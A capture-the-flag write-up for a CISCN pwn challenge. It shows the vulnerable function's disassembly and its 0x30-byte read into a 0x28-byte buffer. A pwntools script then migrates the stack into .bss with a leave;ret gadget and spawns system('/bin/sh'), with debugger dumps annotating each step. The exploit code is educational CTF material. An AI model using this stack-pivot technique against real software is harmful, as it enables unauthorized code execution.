Stack migration in Ciscn…

Ciscn_Pwn_Stack_Migration

Main Source Code

main:

.text:080485FF ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:080485FF                 public main
.text:080485FF main            proc near               ; DATA XREF: _start+17↑o
.text:080485FF
.text:080485FF var_4           = dword ptr -4
.text:080485FF argc            = dword ptr  8
.text:080485FF argv            = dword ptr  0Ch
.text:080485FF envp            = dword ptr  10h
.text:080485FF
.text:080485FF ; __unwind {
.text:080485FF                 lea     ecx, [esp+4]
.text:08048603                 and     esp, 0FFFFFFF0h
.text:08048606                 push    dword ptr [ecx-4]
.text:08048609                 push    ebp
.text:0804860A                 mov     ebp, esp
.text:0804860C                 push    ecx
.text:0804860D                 sub     esp, 4
.text:08048610                 call    init
.text:08048615                 sub     esp, 0Ch
.text:08048618                 push    offset s        ; "Welcome, my friend. What's your name?"
.text:0804861D                 call    _puts
.text:08048622                 add     esp, 10h
.text:08048625                 call    vul
.text:0804862A                 mov     eax, 0
.text:0804862F                 mov     ecx, [ebp+var_4]
.text:08048632                 leave
.text:08048633                 lea     esp, [ecx-4]
.text:08048636                 retn
.text:08048636 ; } // starts at 80485FF
.text:08048636 main            endp
.text:08048636
int __cdecl main(int argc, const char **argv, const char **envp)
{
  init();
  puts("Welcome, my friend. What's your name?");
  vul();
  return 0;
}

vul:

int vul()
{
  char s; // [esp+0h] [ebp-28h]

  memset(&s, 0, 0x20u);
  read(0, &s, 0x30u);
  printf("Hello, %s\n", &s);
  read(0, &s, 0x30u);
  return printf("Hello, %s\n", &s);
}

Exploit Script

#coding:utf-8
from pwn import *
context.log_level = "debug"

# buf_size = 0x28
# read_size = 0x30
# buf_addr = ebp - 0x28
sh = process("./pwn")
elf = ELF('./pwn')

# vul loop1:
sh.send('good boy1')
gdb.attach(sh,'b *vul+104')
sh.send('a'*0x28 + p32(0x804b000-0x100) + p32(elf.symbols['vul'] + 6))
''' Program Status
──────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────────────────────
 EAX  0x30
 EBX  0x0
 ECX  0xfff9442c ◂— 'Hello, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n'
 EDX  0xf7ee2890 ◂— 0x0
 EDI  0xf7ee1000 ◂— 0x1d9d6c
 ESI  0xf7ee1000 ◂— 0x1d9d6c
 EBP  0xfff969a8 —▸ 0x804af00 ◂— 0x0
 ESP  0xfff96980 ◂— 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
 EIP  0x80485fd (vul+104) ◂— leave  
───────────────────────────────────────────────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────────────────────────────────────────────
   0x80485ee <vul+89>     push   eax
   0x80485ef <vul+90>     push   0x80486ca
   0x80485f4 <vul+95>     call   printf@plt <0x80483e0>

   0x80485f9 <vul+100>    add    esp, 0x10
   0x80485fc <vul+103>    nop    
 ► 0x80485fd <vul+104>    leave  
   0x80485fe <vul+105>    ret    

   0x80485ff <main>       lea    ecx, dword ptr [esp + 4]
   0x8048603 <main+4>     and    esp, 0xfffffff0
   0x8048606 <main+7>     push   dword ptr [ecx - 4]
   0x8048609 <main+10>    push   ebp
────────────────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────────────────
00:0000│ esp  0xfff96980 ◂— 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
... ↓
──────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────────────
 ► f 0  80485fd vul+104
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Breakpoint *vul+104
pwndbg> stack 20
00:0000│ esp  0xfff96980 ◂— 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
... ↓
0a:0028│ ebp  0xfff969a8 —▸ 0x804af00 ◂— 0x0
0b:002c│      0xfff969ac —▸ 0x804859b (vul+6) ◂— sub    esp, 4

'''
pause()
'''**********Notes*************
{???} means a program address random....
{==>} means point to....
{<= } means value at the address
'''

'''*********cover ebp**********
ebp = ??? ==> 0x804af00 <= 0
'''

'''***** hijacking ebp and cover return address to vul+6 ******
leave: 
    mov esp,ebp ;    
        esp = ??? ==>0x804af00 <= 0
    pob ebp ;             
        esp = ???+4 ; 
        ebp = 0x804af00 <=0
ret vul+6;
'''

#vul loop2:
#gadget
leave_ret = 0x80484b8

sh.send('good boy2')
payload = p32(elf.plt['system']) + p32(0) + p32(0x804aed8 + 0x10)
payload = payload.ljust(0x10, '\0') + '/bin/sh\0'
payload = payload.ljust(0x28, '\0') + p32(0x804aed4) + p32(leave_ret)
gdb.attach(sh,'b *vul+104')
sh.send(payload)

'''******** send payload ********
1.buf_addr = ebp - 0x28 = 0x804af00 - 0x28 = 0x804aed8
2.(0x804aed8 + 0x10 = 0x804aef8) This value was writed in 0x 804aef0...It means that args point to '/bin/sh' at 0x804aef8...
3.ebp = 0x804af00 ==> 0x804aed4 <= 0
4.leave:
        mov esp,ebp:
            esp = 0x804af00 ==> 0x804aed4 <= 0 ; 
        pop ebp:
            esp = 0x804af04 ==> leave_ret;
            ebp = 0x804aed4;
5.ret leave_ret
'''

'''******* leave_ret*********
leave:
    mov esp,ebp:
        esp = 0x804aed4 <= 0;
    pop ebp:
        esp = 0x804aed8 ==> system
        ebp = 0x0;
ret system('/bin/sh');
----------------------------------------------------------------------------
pwndbg> stack 30
00:0000│ esp  0x804aed8 —▸ 0x8048400 (system@plt) ◂— jmp    dword ptr [0x804a018]
01:0004│      0x804aedc ◂— 0x0
02:0008│      0x804aee0 —▸ 0x804aee8 ◂— '/bin/sh'
03:000c│      0x804aee4 ◂— 0x0
04:0010│      0x804aee8 ◂— '/bin/sh'
05:0014│      0x804aeec ◂— 0x68732f /* '/sh' */
06:0018│      0x804aef0 ◂— 0x0
... ↓
0a:0028│      0x804af00 —▸ 0x804aed4 ◂— 0x0
0b:002c│      0x804af04 —▸ 0x80484b8 (deregister_tm_clones+40) ◂— leave  
0c:0030│      0x804af08 ◂— 0x0
------------------------------------------------------------------------------
'''

sh.interactive()

Mind: